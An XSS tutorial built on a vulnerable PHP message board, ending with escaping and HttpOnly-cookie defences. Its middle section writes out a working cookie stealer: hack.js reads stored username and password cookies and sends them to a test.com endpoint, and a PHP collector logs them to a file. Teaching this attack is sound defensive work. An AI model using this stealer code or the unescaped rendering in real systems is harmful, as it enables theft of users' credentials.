Cross-site scripting attack XSS

Cross-site scripting (abbreviated XSS rather than CSS to distinguish it from Cascading Style Sheets) refers to an attacker inserting malicious HTML or script code into a web page. When a user browses the page, the code embedded in the page is executed in that user's browser, achieving whatever purpose the attacker intended.

A simple message board

We have a page that lets users post comments and then displays the list of comments at the bottom of the page:

<!DOCTYPE html>
<html>
<head>
    <?php include('/components/headerinclude.php');?>
    <style type="text/css">
        .comment-title{
            font-size:14px;
            margin: 6px 0px 2px 4px;
        }

        .comment-body{
            font-size: 14px;
            color:#ccc;
            font-style: italic;
            border-bottom: dashed 1px #ccc;
            margin: 4px;
        }
    </style>
    <script type="text/javascript" src="/js/cookies.js"></script>
</head>
<body>
    <form method="post" action="list.php">
        <div style="margin:20px;">
            <div style="font-size:16px;font-weight:bold;">Your Comment</div>
            <div style="padding:6px;">
                Nick Name:
                <br/>
                <input name="name" type="text" style="width:300px;"/>
            </div>
            <div style="padding:6px;">
                Comment:
                <br/>
                <textarea name="comment" style="height:100px; width:300px;"></textarea>
            </div>
            <div style="padding-left:230px;">
                <input type="submit" value="POST" style="padding:4px 0px; width:80px;"/>
            </div>
            <div style="border-bottom:solid 1px #fff;margin-top:10px;">
                <div style="font-size:16px;font-weight:bold;">Comments</div>
            </div>
            <?php
                require('/components/comments.php');
                if(!empty($_POST['name'])){
                    addElement($_POST['name'],$_POST['comment']);
                }
                renderComments();
            ?>
        </div>
    </form>
</body>
</html>


The addElement() method adds a new comment and the renderComments() method displays the list of comments. The web page looks like this:


image

XSS

Because we completely trust user input, a user with ulterior motives can enter something like this:

image

In this way, no matter who visits the page, the browser console will output "Hey you are a fool fish!". If this were only a malicious little joke it would be harmless, but some people do things that are not so cute: a user can exploit this vulnerability to steal other users' information, trick people into opening malicious websites or downloading malicious programs, and so on. Let's look at the simplest example.

Using XSS to steal a username and password

Of course, this example is very simple and almost no real website could be attacked this way; it is only here to show how the attack works. Many login pages offer to remember the user name and password so the user can log in more easily next time, and some websites record the user name and password in a cookie in plain text. A malicious user registers an account, logs in, and uses a simple tool to inspect the cookie structure and names. If the website has an XSS vulnerability, he can then simply use JSONP to obtain the username and password of other users.

A malicious user would type something like this:

image

Let's see what's hidden in http://test.com/hack.js:

var username=CookieHelper.getCookie('username').value;
var password=CookieHelper.getCookie('password').value;
var script =document.createElement('script');
script.src='http://test.com/index.php?username='+username+'&password='+password;
document.body.appendChild(script);

A few lines of JavaScript read the username and password from the cookie and use a JSONP-style script tag to send them to http://test.com/index.php with a GET request:

http://test.com/index.php

<?php
    if(!empty($_GET['password'])){
        $username=$_GET['username'];
        $password=$_GET['password'];
        
        try{
            $path=$_SERVER["DOCUMENT_ROOT"].'/password.txt';
            $fp=fopen($path,'a');
            flock($fp, LOCK_EX);
            fwrite($fp, "$username\t $password\r\n");
            flock($fp, LOCK_UN);
            fclose($fp);
        }catch(Exception $e){

        }
    }
?>

In this way, a malicious user can steal the information of every user who visits the message board.

How to prevent it

The demonstration above is a very simple XSS attack, and there are many more hidden variants, but the core of all of them is script injection, so the solution is actually very simple: do not trust user input, and escape special characters such as "<" and ">" before outputting them, which prevents the problem at its root. Of course, many platforms have their own specific XSS protections; for example, the method above does not work as-is in ASP.NET, because Microsoft's validateRequest automatically performs XSS validation on form submissions. But there is no way to prevent everything: there will always be some clever malicious users who come to our website to wreck it. If you are worried about your own site, you can run an XSS cross-site test against it to see whether the site is safe.
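As an added example (not the page's own /components/comments.php), here is a minimal implementation of the addElement() and renderComments() helpers that list.php calls, showing the vulnerable rendering beside an output-escaped version; the in-memory $comments array, the e() helper and the sample comment are assumptions for the demonstration, and the HttpOnly cookie line at the end shows the standard mitigation against reading cookies from script:

```php
<?php
// Added example, not the original page's comments.php. Comments are kept
// in a constructed in-memory array instead of a real database.
$comments = [];

function addElement(string $name, string $comment): void {
    global $comments;
    // Store the raw input; escaping belongs at output time, where the context is known.
    $comments[] = ['name' => $name, 'comment' => $comment];
}

// Vulnerable rendering, equivalent to what the page's message board does:
// user-controlled text is concatenated into the HTML unchanged.
function renderCommentsUnsafe(): string {
    global $comments;
    $html = '';
    foreach ($comments as $c) {
        $html .= '<div class="comment-title">' . $c['name'] . '</div>';
        $html .= '<div class="comment-body">' . $c['comment'] . '</div>';
    }
    return $html;
}

// Escape for the HTML text context. ENT_QUOTES also escapes ' and ",
// and the explicit charset avoids encoding-based bypasses.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened rendering: every user-supplied value passes through e().
function renderComments(): string {
    global $comments;
    $html = '';
    foreach ($comments as $c) {
        $html .= '<div class="comment-title">' . e($c['name']) . '</div>';
        $html .= '<div class="comment-body">' . e($c['comment']) . '</div>';
    }
    return $html;
}

// Constructed sample input of the kind the page describes.
addElement('guest', '<script>console.log("Hey you are a fool fish!")</script>');
echo renderCommentsUnsafe(), "\n";   // <script> tag reaches the browser intact
echo renderComments(), "\n";         // &lt;script&gt;... is shown as inert text

// Defence in depth: a cookie marked HttpOnly cannot be read by document.cookie
// or a helper like the page's CookieHelper, so even a successful injection
// cannot exfiltrate it. Never store a password in a cookie at all.
setcookie('session', bin2hex(random_bytes(16)),
    ['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
```

The escaping is applied on output rather than on input so the same stored comment can be rendered safely in any context, and the cookie settings only mitigate theft; they do not fix the injection itself.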


Origin http://43.154.161.224:23101/article/api/json?id=325344310&siteId=291194637